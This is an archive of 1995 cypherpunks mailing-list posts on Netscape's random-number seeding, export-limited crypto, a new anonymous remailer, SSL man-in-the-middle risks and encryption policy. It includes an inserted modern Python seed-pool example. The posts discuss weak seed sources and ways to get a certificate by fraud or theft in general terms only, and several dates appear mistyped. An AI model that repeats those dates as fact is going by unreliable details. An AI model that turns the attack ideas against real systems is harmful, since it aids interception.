From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 00:32:57 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape RNG
In-Reply-To: <199509250649.CAA27099@clark.net>
Message-ID: <445lti$hej@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509250649.CAA27099@clark.net>, rjc@clark.net (Ray Cromwell) writes:
>  I'm thinking from the standpoint of someone gathering data on someone
> or some server to mount a specific attack. a "most common directories
> on the macintosh" file for instance could be used to attack the
> current directory method.
> 
>   Using those sources probably can't hurt, they just seemed
> like odd choices, "grasping for straws" so to speak.

  I'd rather think of it as a "kitchen sink" approach :-). We are looking
for bits wherever we can find them.  We are not experts in the internals
of all of our supported systems, so any suggestions people could provide
for more high quality sources on specific systems would be appreciated.

>   Nevertheless, I would like to commend Netscape for releasing
> the source code for public review. You guys are clearly an intelligent
> company, in both your current developments, but also the way
> you have handled this bad press.

  I'd like to add that management has been very supportive of this
idea.  Barksdale was in the cellular industry when their security
through obscurity measures failed, so he knew exactly what we
were talking about.

> p.s. i hope you guys do a good internal review of your code to remove
> buffer overflow bugs

  We have had code reviews.  We will be fixing several of this sort
of bug in the upcoming patch.
 
	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 25 Sep 95 10:19:57 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape for Linux?
In-Reply-To: <445hej$h03@tera.mcom.com>
Message-ID: <199509251135.HAA13693@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> > ... would be nice if we could get 128 bit keys, though ... (hint,
> > hint).
> 
> We are working this issue with the government.  As soon as we can
> make it available for download we will.

In other words, we will never see it in our lifetimes -- the
bureaucreeps aren't known for promoting the spread of strong crypto.

By the by, are you guys going to be taking any action vis a vis the
discovery of weak keys in RC4?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 25 Sep 95 10:22:06 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251137.HAA13703@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
>   More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
> and feed it through the RNG hash.

You should search for the PGPPATH environment variable rather than
making assumptions about where it is...

> On Unix and PC systems we feed the environment through the hash, so
> that would be a good place for a concerned user to put some random
> stuff of their own.

Not a bad idea, but not a substitute for extracting enough bits of
entropy on your own...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Mon, 25 Sep 95 10:24:53 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251138.HAA18954@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


jsw@neon.netscape.com said:
>   More on the RNG stuff.  On Unix systems we look for ~/.pgp/
> randseed.bin, and feed it through the RNG hash.  On Unix and PC 
> systems we feed the environment through the hash, so that would be a 
> good place for a concerned user to put some random stuff of their 
> own. 

For UNIX, including the environment is pretty useless for determining a seed. 
On BSD-style machines, try a ps -uxeww. The environment is known by anyone who 
has access to the machine when the seed is generated, and possibly to many 
others, since some machines have SNMP daemons that will give out the process 
table, or may have the systat "service" turned on.

The latter two may not include the environment on most machines, but I believe 
it conceivably could, and may be implementation specific from UNIX to UNIX.

I greatly applaud Netscape for "going public" with this information, and 
remaining open to suggestions despite the bad publicity it has been getting. 
One of the large corporations I work with is looking to do an electronic 
commerce with some pretty amazing $ amounts soon (at least, amazing to me), 
and I know I'm going to be asked about the security breaks. I feel confident 
that I can tell them exactly what is wrong, and what Netscape is doing to fix 
it, and that I don't think it should be a matter for great concern. I'm not 
sure I could have done that had Netscape done nothing but issue the press 
release and weather the bad press in silence.

Bob
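
Bob Snyder's point about `ps -uxeww` and Perry Metzger's point that the environment is no substitute for real entropy can be made concrete with a seed pool that mixes every input but credits secret bits only to inputs other users cannot read. This is an added example, not Netscape's code; the `SeedPool` class, the 128-bit threshold, the sample environment and the use of `os.urandom` as the private source are all assumptions.

```python
import hashlib
import os

# Constructed sample environment, including "random stuff" a user might add.
SAMPLE_ENV = {
    "HOME": "/home/alice",
    "USER": "alice",
    "MY_RANDOM_STUFF": "constructed-value-8f1c2b7e",
}


def serialize_environment(environ):
    """Canonical byte form: sorted NAME=value records, each NUL-terminated."""
    return b"".join(
        f"{name}={environ[name]}".encode("utf-8", "surrogateescape") + b"\0"
        for name in sorted(environ)
    )


class SeedPool:
    """Hash-based pool that counts only bits an outside observer cannot know."""

    REQUIRED_SECRET_BITS = 128  # assumed minimum before a seed may be taken

    def __init__(self):
        self._hash = hashlib.sha256()
        self.secret_bits = 0

    def add(self, label, data, secret_bits):
        # Length-prefix both fields so different (label, data) splits
        # can never feed the same bytes into the hash.
        for part in (label.encode(), data):
            self._hash.update(len(part).to_bytes(4, "big") + part)
        self.secret_bits += secret_bits

    def state(self):
        """Digest of everything mixed in so far (exposed for the comparison)."""
        return self._hash.copy().digest()

    def ready(self):
        return self.secret_bits >= self.REQUIRED_SECRET_BITS

    def seed(self):
        if not self.ready():
            raise RuntimeError(
                f"only {self.secret_bits} secret bits credited, "
                f"{self.REQUIRED_SECRET_BITS} required")
        return self.state()


def pool_from_environment(environ):
    """Environment only: mixed in, but credited with zero secret bits,
    because anyone who can list the process table can read it."""
    pool = SeedPool()
    pool.add("environment", serialize_environment(environ), secret_bits=0)
    return pool


def pool_with_own_entropy(environ, read_random=os.urandom):
    """Environment plus 32 bytes from a source other users cannot observe."""
    pool = pool_from_environment(environ)
    pool.add("os-csprng", read_random(32), secret_bits=256)
    return pool
```

Two pools built from the same environment reach the same state, so a user-supplied variable adds nothing an observer on the machine lacks; only the privately read bytes make the seed differ.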





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Mon, 25 Sep 95 10:13:44 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <199509250712.CAA01003@khijol>
Message-ID: <199509251143.HAA19012@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


khijol!erc@uunet.uu.net said:
> As much as this might put me at odds with certain parts of the CP 
> community, this seems quite reasonable to me.  After all, why should 
> someone provide support for a platform which is not generating 
> revenue? 

I don't think any of us disagree with that. I think what we disagree about is 
getting Netscape to accept our revenue. :-) I've tried calling and emailing to 
buy a copy of Linux, and the answer was always, "It's not available for 
Linux." Despite what's on their FTP server.

I mostly want the stronger crypto in the US only version, but Netscape has 
said they are trying to make that available for FTP, so I can wait. I also 
want Java, but no one has that yet, and the 2.0 will probably be available 
for Linux, so I can wait for that too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 25 Sep 95 10:27:29 PDT
To: cypherpunks@toad.com
Subject: Electronic Commerce
Message-ID: <v02120d04ac8c47758ce3@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: Ravi Kalakota <kalakota@uts.cc.utexas.edu>
Subject: Electronic Commerce
To: www-buyinfo@allegra.att.com
Date: Sun, 24 Sep 1995 23:52:47 -0600 (CDT)
Mime-Version: 1.0


(If you have seen this before, we apologize ....)

----------------------------------------------------------

FINAL CALL for Participation
            International Conference on Electronic Commerce

This posting includes: Final Program, Registration form,
Hotel, and Speaker information. All other conference related
information can be found at:

---->     http://cism.bus.utexas.edu/ravi/ecomm.html

Thanks,

-- Ravi Kalakota and Andrew Whinston
       (Conference Organizers)

If you are interested, please register quickly as
we have limited space available and will not be able to
accommodate more than conference room capacity.


*************  FINAL PROGRAM ***********
Sixth conference on Organizational Computing, Coordination and
Collaboration

INTERNATIONAL CONFERENCE ON ELECTRONIC
COMMERCE
Theme: Frontiers of Electronic Commerce
October 30-31, 1995

-------------------
Sunday, October 29 6-7:00 p.m.
Reception at Red Lion Hotel,

6121 North IH 35, Austin, Texas
-------------------

Monday, October 30

7:45 a.m. Continental Breakfast
8:15 a.m. Welcome Address

Session I:  Internet-Based Commerce:
                        The Promises and Pitfalls
------------------------------------------------
8:30 a.m. An Unaffiliated View of Electronic Commerce
                Dave Crocker
                Brandenburg Consulting

Issues in Electronic Commerce: The First Virtual Experience
                Nathaniel Borenstein
                First Virtual Holdings

Session II:  Electronic Payment Systems
------------------------------------------------
10:30 a.m. Implementing Online Payments:

The NetCash and NetCheque Systems
Clifford Neuman
USC/ISI

Systems of Electronic Commerce: Payment and More
Win Treese
Open Market, Inc.

 Session III: Electronic Catalogs and Brokerages
------------------------------------------------
1:30 p.m. Smart Catalogs and Virtual Catalogs
Arthur M. Keller
Stanford University and Commerce Net

Organizing for Electronic Commerce
Ravi Kalakota
The University of Rochester


Session IV:  World Wide Web and Electronic Documents
------------------------------------------------
3:30 p.m. Formalizing Web Technology
Dan Connolly
Massachusetts Institute of Technology/W3 Organization

Document Issues in Electronic Commerce
Larry Masinter
Xerox Palo Alto Research Center

------------------------------------
6:30 p.m. Banquet at Red Lion Hotel
------------------------------------
Tuesday, October 31

8:00 a.m. Continental Breakfast


Session V:  Internet Marketing and Demographics
------------------------------------------------

8:30 a.m. Marketing on the Internet: Who is Making Money?
Jill H. Ellsworth
Oak Ridge Research

Measuring the Internet Audience
Donna Hoffman
Vanderbilt University and Interval Research Corporation


Session VI:  Supply Chain Management
------------------------------------------------
10:30 a.m. Electronic Commerce and Supply Chain Management
Jan Stallaert
The University of Texas at Austin

Electronic Data Interchange
Forrest Malone
Electronic Commerce Resource Center


Session VII:  Economics and Electronic Commerce
----------------------------------------------------------
1:00 p.m. Electronic Auctions and Application to

Spread Spectrum Band-Width Allocations
Preston McAfee
Massachusetts Institute of Technology

Product and Infrastructure Pricing
Andrew Whinston and Dale Stahl
The University of Texas at Austin

Internet Service Providers: Changing Dynamics
Smoot Carl-Mitchell and John Quarterman
Zilker Internet Park, Matrix Information and Directory Services,
Inc.


Session VIII:  Panel Discussion:
                             Issues in Internet Commerce
------------------------------------------------
Su-Shing Chen, National Science Foundation
James B. Rapp
Richard Bolton, National Industrial Information
                   Infrastructure Protocols Consortium (NIIIP)
5:00 p.m. Conference adjourns



*************  REGISTRATION FORM ***********


Name (Please type) _____________________________________
                          (Prof., Dr., Mr., Ms., Mrs.)   First      Last

Title: _______________________________________

Organization: _________________________________

Address: ____________________________________

         _______________________________________
           City           State      Zip Code       Country

Telephone: (_____)__________ Work   (_____)________Home

Fax:       (_____)__________    Email: __________________

Which days do you plan to attend?
        Sunday, Oct.29  ______ (Reception)
        Monday, Oct.30  ______ (Lunch)
        Monday, Oct.30  ______ (Banquet)
        Tuesday, Oct.31  ______ (Lunch)

Registration Fee:  Before October 13, 1995 ______ $300
                :  After October 13, 1995    ______ $395

(Payment must be made by check or money order

payable to the RGK Foundation.)

Please complete and mail this registration form along with
registration
fee before Friday, October 13, 1993 to:

Electronic Commerce Conference
RGK Foundation
1301 W.25th Street Suite 300
Austin, TX 78705

Phone: 512-474-9298
Fax:   512-474-6389

To register for the conference, complete and mail the
Registration Form to the RGK Foundation
at 1301 W. 25th Street, Suite 300, Austin, Texas 78705.
Be sure to include a check for the registration
fee payable to the RGK Foundation.

The registration fee is $300 for registrations
received before Friday, October 13 and $395
after October 13 and includes the reception on
Sunday, the banquet on Monday evening,
breakfast and lunch on Monday and Tuesday,
coffee breaks, scheduled ground transportation to and
from the conference site, and conference materials.

*************  HOTEL   INFORMATION ***********

We have reserved a block of rooms at the Red Lion Hotel
Austin Airport, 6121 North IH 35, Austin, Texas 78752.
The special room rate of $89.00 single/double will be
available for those who make reservations before
Friday, October 13.  After this date, the special rate
and room availability cannot be guaranteed.

Make your reservations by calling 512-323-5466
and mentioning the Electronic Commerce Conference.

*************  SPEAKER   INFORMATION ***********

1.      Nathaniel Borenstein
        Chief Scientist, First Virtual Holdings

Nathaniel is a primary author of MIME, the Internet standard format
for interoperable multimedia data, and the author of various widely
used software packages, including the Andrew Message System,
metamail, ATOMICMAIL, and Safe-Tcl. He specializes in end-user
interfaces, and is the author of the book "Programming As If
People Mattered."

2.      Clifford Neuman
Research Assistant Professor, University of Southern California and
Scientist, USC Information Sciences

Clifford Neuman is a scientist at the Information Sciences Institute
of the University of Southern California (USC) and holds a research
faculty appointment in the Computer Science Department.  After
receiving a S.B. degree from the Massachusetts Institute of
Technology in 1985 he spent a year working for Project Athena
where he was one of the principal designers of the Kerberos
authentication system.  Dr. Neuman received M.S. and Ph.D.
degrees from the University of Washington, where he designed the
Prospero Directory Service which is widely used to locate
information from Internet archive sites.  His recent work includes
the development of a security infrastructure supporting
authorization, accounting, and electronic payment mechanisms. Dr.
Neuman leads the design and implementation of the NetCheque and
NetCash payment systems.

3.      Dave Crocker
Brandenburg Consulting
Title: An Unaffiliated View of Electronic Commerce

Dave Crocker is the primary author of The EDI on the Internet
RFC.  He is an active participant in the Internet Engineering and
Technical Standards Committee and has influenced numerous
internet standards.

4.      Dan Connolly
Research Associate, MIT/W3C

Dan Connolly discovered the web project soon after graduating
U.T. Austin in 1990. His industry experience in online
documentation tools, distributed computing,  and information
delivery kept him in touch with the project while he was at Dazel and
HaLSoft.  His background in formal systems led him to work on the
specification of HTML and other parts of the web.

 5.      Professor Donna Hoffman
Owen Graduate School of Management
Vanderbilt University

Donna Hoffman is an Associate Professor of Marketing and directs
Project 2000, a research program in Computer-Mediated Marketing
Environments which is devoted to  studying the marketing
implications of commercializing the World Wide Web.  Examples of
current projects include 1) developing the strategic marketing
implications of commercial scenarios of the Web; 2) modeling
consumer response to advertising and consumer search and
purchase behavior in online commercial environments; 3) survey
research on Internet usage; and 4) consumer behavior implications
of computer-mediated communications.

 6.      Smoot Carl Mitchell
Zilker Internet Park

Smoot Carl-Mitchell is Managing Partner in Texas Internet
Consulting (TIC), which consults in networks and open systems,
with particular emphasis on TCP/IP networks, UNIX systems and
standards.  He was the principal author of Practical Internetworking
with TCP/IP and UNIX, 1993 and is co-author of The Internet
Connection:  System Connectivity and Configuration.  He is also
President of Matrix Information and Directory Services, Inc., of
Austin.

 7.      Andrew Whinston
The University of Texas at Austin

Andrew B. Whinston is the Hugh Roy Cullen Centennial Chair in
Business Administration, Professor of Information Systems,
Computer Science and Economics and Director of the Center for
Information Systems Management.  He is editor of two journals
Decision Support Systems and Organizational Computing and
co-author or co-editor of 15 books and over 250 articles.  Recent
research interests are Internet pricing and application of client-server
computing especially to support groups working collaboratively.

 8.      Ravi Kalakota
Xerox Assistant Professor of Information Systems
The University of Rochester

Ravi Kalakota received his Ph.D from the University of Texas at
Austin.   He has  been working in the area of electronic commerce
since 1992.   He is currently focusing on the challenges of
organizing for electronic commerce: structured documents,
processes/workflows, and broker architectures. His current project
is on "New Product Introduction Using the Internet." He is also the
co-author of a forthcoming book: The Frontiers of Electronic
Commerce (Addison Wesley).

9.      Win Treese
Director of Advanced Technology
Open Market, Inc.

Win Treese leads the security and advanced technology groups at
Open Market, Inc., a young company developing systems and
software for electronic commerce.  He has previously been a
member of the research staff at Digital Equipment Corporation's
Cambridge Research Laboratory and Chief Systems Engineer at
MIT's Project Athena.

 10.     Larry Masinter
Principal Scientist
Xerox Palo Alto Research Center

Dr. Masinter is a principal scientist at the Xerox Palo Alto Research
Center. He  has been working in the area of document management
system architecture since 1988, the Web standards groups from their
inception, and the research area of Digital Libraries since 1993.

 11.     Jill H. Ellsworth
Senior Partner, Oak Ridge Research

Jill H. Ellsworth, Ph.D., Senior Partner with Oak Ridge Research,
is a consultant regarding business on the Internet for Fortune 500
companies, and is a frequent speaker in North America
and Europe about business, marketing and education on the
Internet. A former university Professor and Dean, she holds a
doctorate from Syracuse University. Ellsworth is the author of
numerous books, including The Internet Business Book, Marketing
on the Internet, the Internet Business Kit (John Wiley & Sons), and
Education on the Internet (Sams/Macmillan). She serves on the
Survey Working Group of the Internet Society.

12.     Su-Shing Chen
Professor of Computer Science
University of North Carolina

Dr. Chen received his Ph.D. in 1970 from the University of
Maryland. He was on the faculty of University of Florida, Georgia
Tech, University of Maryland, and University of North Carolina.
From 1983-85 and 1991-95, he served as NSF Program Directors
of Intelligent Systems, Knowledge Models & Cognitive Systems,
and Information Technology & Organizations.

13.     Dr. Arthur Keller
Senior Research Scientist
Stanford University

Dr. Arthur Keller  is a Senior Research Scientist at Stanford
University.  He is  Project Manager of Stanford University's
participation in CommerceNet, which is  doing the first large-scale
market trial of electronic commerce on the Internet.  He leads the
effort on smart catalogs and virtual catalogs.  He was Manager of
the Penguin project, to provide sharing of persistent object data
among multiple applications.  He is also working on managing
inconsistency in federated, autonomous database systems.  His
publications include work on database security, databases on parallel
computers, incomplete information in databases, database system
implementation, hypertext databases, and computerized typesetting.

 14.     Dr. Jan Stallaert
Assistant Professor
The University of Texas at Austin

Dr. Stallaert received his Ph.D. from UCLA in the area of
management science.  He has been working in the area of supply-
chain management and large-scale logistics problems for several
years.  He is also a consultant for several Fortune 500  companies.

15.     Dr. Preston McAfee
Professor
The University of Texas at Austin and MIT

Dr. McAfee is a leading expert on electronic auctions.  He has been
retained as the principal consultant by the Federal Communications
Commission to devise mechanisms for allocating wireless
frequencies.  He is also the editor of the prestigious American
Economic Review.


--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wmono@Direct.CA (William Ono)
Date: Mon, 25 Sep 95 10:02:11 PDT
To: rops@c2.org
Subject: New remailer now active.
Message-ID: <199509251503.IAA08771@fun.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have an anonymous remailer running at wmono@spook.alias.net - the domain
may or may not change (anybody have any suggestions?).  It runs Mixmaster
2.0.1 and Ghio2 to give both Type I and Type II support.  In the near
future, when I have some time on my hands, I will upgrade to Mix2.0.2.

This remailer is going public as of now.  I have sent this message to
cypherpunks, remailer-operators, and rops, so my apologies in advance
if you receive multiple copies.

Please add it to your pingers and cover-traffic generators.

Although I have tested this remailer a lot, I have only done so from two
accounts, therefore I am not certain of its reliability.  Hopefully any
such problems will be ironed out over the next few days.  For this reason,
I would advise against using it for sensitive materials for a week or so.
If you encounter any difficulties, please contact me at the remailer's
address.  Mail sent regarding the remailer to wmono@direct.ca (my main
address) will be ignored and/or deleted.

Type I remailer's default latency is set to 900 seconds (15 minutes) so add
a Latent-Time: +0:00 header if you want an immediate response.

The keys are below.


From: wmono@spook.alias.net (Anonymous Remailer)
Subject: Remailer keys (as requested)
 
Type I (ghio2) remailer key:
 
 
 
 
Type II (Mixmaster 2.0.1) remailer key:
 
=-=-=-=-=-=-=-=-=-=-=-=
wmono wmono@spook.alias.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
 


- --    ** NOTE NEW KEY **  As of 08/28/95!  Old key 0x2902B621 COMPROMISED!
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGbDUjncl2jz9xa9AQH4RAP+PKHtLC4m3yNH2jZB2VK/Omod+lAqTfVZ
fQkmB6zTCi4y0++8zOLyhyzOZJaG3mwDe++DsW5qf3N7KSfcGlwdwChukyAvnzUC
9YxGODMj0x0a8cj/6XvClMsFtB99clzSfhy8IcTdSQDJOv5PoeHo1GkTuXvgjIyY
2YCDG/pdQpg=
=L3cw
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@eskimo.com (Brian C. Lane)
Date: Mon, 25 Sep 95 10:01:15 PDT
To: sryan@reading.com
Subject: Re: Crypto in Wired
Message-ID: <199509251504.IAA12863@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Sep 1995 20:00:02 -0400 you wrote:

>Good issue of Wired this month (10/95)
>

  I also noticed that on page 35 Chrysler has awarded Philip Zimmermann a 1995 Chrysler Award of Innovation in Design. It's nice to see large corporations taking notice of cryptography.

   Brian

---------------------------------------------------------------------------
blane@eskimo.com                      | Finger for PGP key
http://www.eskimo.com/~blane          | Privacy, Security, and Electronics
ftp://ftp.eskimo.com/~blane           | Misc. Interesting files




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 25 Sep 95 10:03:35 PDT
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: `Random' seed.
In-Reply-To: <9509251229.AA23816@alpha>
Message-ID: <9509251324.AA23974@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker writes:
 > I don't think that anyone has suggested otherwise.  I believe that
 > `clock skew' was the underlying source of randomness that Matt Blaze
 > mentioned in the message where I first saw that code.

Yes, looking at Matt's code I think I believe it.

 > I have no idea how reasonable it would be to use this approach in
 > Netscape, however if it were available as an option to generate, say
 > 300 bits, I'd personally be plenty willing to let it chew up five
 > minutes while I get my morning caffeine.

If you look at it that way (the software just generates new bits every
once-in-a-while, like daily) I guess I wouldn't mind.  I mean, heck,
it's not like there aren't 3 dozen other random daemons that pop up
and eat my CPU every now and then :-)  It'd only really be a problem
if it were used as an "operational" source of random bits.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 25 Sep 95 10:04:05 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Patents and trade secrets was: Encryption algorithms used in
In-Reply-To: <9509250357.AA21926@cs.umass.edu>
Message-ID: <0THZBD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Some unknown person writes:
>> It just moves the prior art date from the date of invention to the date
>> of filing the patent application.

>What happens if the chronology goes like this ?
>
>(0) Alice invents a snaffleblort.
>(1) Bob invents a snaffleblort.
>(2) Bob files for a patent on a snaffleblort.
>
>From what you said, it would appear that Alice's prior art won't count when
>it comes to considering the validity of Bob's patent claim. Is that correct?

The bizarre history of the invention of radio comes to my mind. Perhaps we can
learn something from it. The Russian Alexander Popov taught for 18 years at a
naval school in Kronstadt (near St Petersburg, Russia). He was fascinated by
Hertz's 1888 paper on electromagnetic waves and worked with his students on
improving his results. In 1889 Russian Navy granted him funds to investigate
the use of electromagnetic waves for telecommunications. It's undisputed that
Popov invented the antenna in 1894, and built a (subsequently widely used)
apparatus for advance warning of thunderstorms in 1995. Now the disputed part:
Popov published his paper _Pribor dlja obnaruzhenija i registrirovanija
elektrichiskikh kolebanij_ in the January 1896 issue of _Zhurnal Russkogo
Fiziko-Khimicheskogo Obshchestva_. In it he described the first radio
receiver. On May 7, 1895 and March 12, 1896 Popov made public presentations to
the Russian Physico-Chemical Society demonstrating his invention and (in March
1896) transmitted the words "Heinrich Hertz" (in a Morse-like code) at a
distance of 250 meters.

In June 1896 Guglielmo Marconi filed for a patent in England. He offered to the
British government his inventions for wireless transmission of signals, whose
details he kept secret. The news of his application and the description of his
invention weren't made public until June 1897, when the patent was granted, at
which point Popov raised hell and wrote letters to numerous newspapers,
claiming that Marconi's patent application was substantially identical to
Popov's publications. Meanwhile, Popov continued working on his transmitters/
detectors; by the spring of 1897 he was transmitting at 640m. He got more
funds and built 5km equipment by the summer of 1897. In 1900 he installed a
production radio-telegraph system between several islands in the Gulf of
Finland 50 km apart. After the Marconi incident, Russians viewed radio
transmissions technology as a military secret and didn't publish these results
until many years later, although comparable technology was available
commercially in the West. Popov was always low on funds. Marconi, a brilliant
entrepreneur, sold stock in his corporation, raised capital, hired other
prominent scientists to work with him, and was developing new technologies
much faster.

In 1901 Marconi was transmitting radio signals across the Atlantic Ocean, and
Popov retired from the naval school and went to teach at the SPB electro-
technical institute; he was soon elected its president. In 1904, before the
beginning of Russo-Japanese war, the Russians had to buy in great hurry a
large quantity of radio receivers/transmitters - made commercially in Germany
under Marconi's patent. Popov, no longer with the Navy, got to supervise their
installation in Russian naval ships. (Russia lost that war pretty miserably,
by the way.)

What, you might ask, is the cryptographic relevance of all this? Well, in 1914
Russia was waging war against Germany. Russian military officers in East
Prussia relied on radio to transmit information. Russians knew about crypto,
but the key distribution was so screwed up that most of their transmissions
were in cleartext. (Besides, radio was supposed to be a Russian invention not
available to the uncultured foreigners.) Germans reportedly found the
intercepted radio transmissions most helpful. Germans also broke the weak code
used by the Russians in East Prussia within weeks. Their complete knowledge of
Russian weaknesses and troop movements led to Russian defeat in East Prussia,
after initial advances.

(The last claim is from the book _Tajnopis' v istorii Rossii_ (Cryptography in
Russian history) by T.A.Soboleva; someone ought to publish its translation.)

Soboleva also mentions that East Prussia had an advanced phone system which
the Russians didn't disable. On several occasions German civilians from remote
farms called Germany from across the front lines and reported on what the
Russians were up to.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Mon, 25 Sep 95 10:10:14 PDT
To: Eric Young <eay@mincom.oz.au>
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <Pine.SOL.3.91.950925090641.7344B-100000@orb>
Message-ID: <199509251247.IAA27297@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 25,  9:35, Eric Young sent the following to the NSA's mail archives:
> Subject: Re: SSL Man-in-the-middle
||
|| On Fri, 22 Sep 1995, David J. Bianco wrote:
|| > Has anyone given much thought to the feasibility of a man-in-the-middle
|| > attack against an SSL (or other similar) transaction?  To me, the
|| > possibility seems obvious, so I figure it must have been discussed before,
|| > though I haven't seen it.
|| ....
|| > Since neither the browser nor the server perform any authentication checks,
|| > neither Bob nor Alice know they are really speaking to Mallet.  The best
|| > Alice can do is check the IP address of the client she's speaking to, but
||
|| Ah, err, the infamous problem of Netscape Navigator refusing to talk to
|| SSL httpd's because they don't have a certificate issued by Verisign is
|| caused by the client authentication the Server certificate.
|| To get a Verisign signed x509 certificate requires quite a bit of proof
|| that your company is who they claim they are.  So server authentication
|| is used.
||

Not so.  VeriSign can only vouch for identity, not intention.  I can fork
out $300 (at last count) and get a signed certificate for my fake company.
 If the stakes are high enough, I can incorporate fairly cheaply, get a
business license, and then I'd have a real company I could submit as.

Or, if I'm lazy, don't have enough money, or unwilling to leave a paper
trail, I'd break into someone's weakly secured server and steal their
certificate.

In either case, I've obtained a "legitimate" signed certificate for
illegitimate purposes.  That's why I don't think just verifying the
signature on the certificate is nearly enough.

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Sep 95 10:11:04 PDT
To: cypherpunks@toad.com
Subject: Golden Coy Freeh
Message-ID: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, January 25, 1995, p. D5.

   The F.B.I. Sting Operation on Child Pornography Raises
   Questions About Cryptography

   By Peter H. Lewis


   Federal agents swooped down on more than 125 homes and
   offices across the United States on Sept. 13, seizing
   computers and diskettes from people suspected of
   trafficking in child pornography over the America Online
   network. But to date, the number of arrests in the sting
   operation remains at 15.

   More arrests are expected, but why haven't more occurred?

   Last week, Louis J. Freeh, the director of the F.B.I.,
   offered an oblique explanation for the seemingly low
   initial success rate.

   At least some of the suspected child pornographers had used
   data encryption software, Mr. Freeh said Thursday in
   remarks at an International Cryptography Institute
   conference in Washington. In other words, they had
   scrambled their computer files so that only someone with
   the password -- or with proper code-breaking skills --
   could view the contents.

   Mr. Freeh wisely did not say whether the F.B.I. agents were
   able to decipher the encrypted files seized in the
   investigation. It would be foolhardy, from a
   law-enforcement perspective, to tip one's hand.

   If the head of the F.B.I. acknowledged that his agency was
   powerless to crack a cryptography program like Pretty Good
   Privacy, the stampede for that software on the Internet
   would make the run on Windows 95 look puny.

   From a political perspective, Mr. Freeh's coyness is shrewd
   as well. By making even a subtle suggestion that some child
   pornographers may walk free because of unbreakable
   cryptography, he gains more leverage in seeking
   Government-mandated controls over the use of encryption
   technology.

